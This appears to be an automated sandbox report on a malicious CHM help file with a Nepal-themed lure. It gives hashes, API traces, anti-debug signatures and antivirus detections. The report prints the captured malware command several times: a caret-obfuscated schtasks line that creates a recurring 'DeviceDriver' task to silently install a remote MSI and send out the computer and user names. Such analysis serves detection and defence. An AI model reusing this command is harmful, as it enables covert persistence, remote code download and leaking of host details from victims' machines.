popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Nepal Relation with European Countries.chm

AntiVM AntiDebug CHM Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 9, 2023, 5:15 p.m. Aug. 9, 2023, 5:17 p.m.
Size 11.0KB
Type MS Windows HtmlHelp Data
MD5 86b57b0ec360f45331fc5e4eb5c99611
SHA256 a2e3f464e1c39909f47f0b837b04e1256061f4a9698678e097b4dd09aa4de9c1
CRC32 343917E6
ssdeep 96:hnV1ra4uzxuoLllqJhgoKAJGnZaVEZeydYRdi7D:h72Bxx47XGJoy
Yara
  • chm_file_format - chm file format

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "DeviceDriver" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
cmdline schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff94000
process_handle: 0xffffffffffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
cmdline schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
cmdline schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
Process injection Process 2640 resumed a thread in remote process 2760
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000284
suspend_count: 1
process_identifier: 2760
1 0 0
Lionic Trojan.HTML.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.67693476
FireEye Trojan.GenericKD.67693476
CAT-QuickHeal Trojan.HTML.Bitter.47423
VIPRE Trojan.GenericKD.67693476
Sangfor Trojan.Generic-Script.Save.aadd533b
Arcabit Trojan.Generic.D408EBA4
Cyren CHM/ABRisk.ZYUM-7
Symantec Trojan.Gen.NPE
ESET-NOD32 HTML/TrojanDownloader.Agent.NKU
TrendMicro-HouseCall Trojan.Win32.FRS.VSNW0EG23
Avast Other:Malware-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.67693476
Tencent Win32.Trojan-Downloader.Ader.Eflw
Emsisoft Trojan.GenericKD.67693476 (B)
DrWeb Exploit.ActiveX.23
TrendMicro Trojan.Win32.FRS.VSNW0EG23
McAfee-GW-Edition Artemis!Trojan
Microsoft Trojan:Win32/Leonem
ZoneAlarm HEUR:Trojan.Script.Generic
GData Trojan.GenericKD.67693476
Google Detected
AhnLab-V3 Downloader/HTML.Generic.S2220
ALYac Trojan.Downloader.CHM
Rising Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
MAX malware (ai score=100)
Fortinet HTML/Agent.NKU!tr.dldr
AVG Other:Malware-gen [Trj]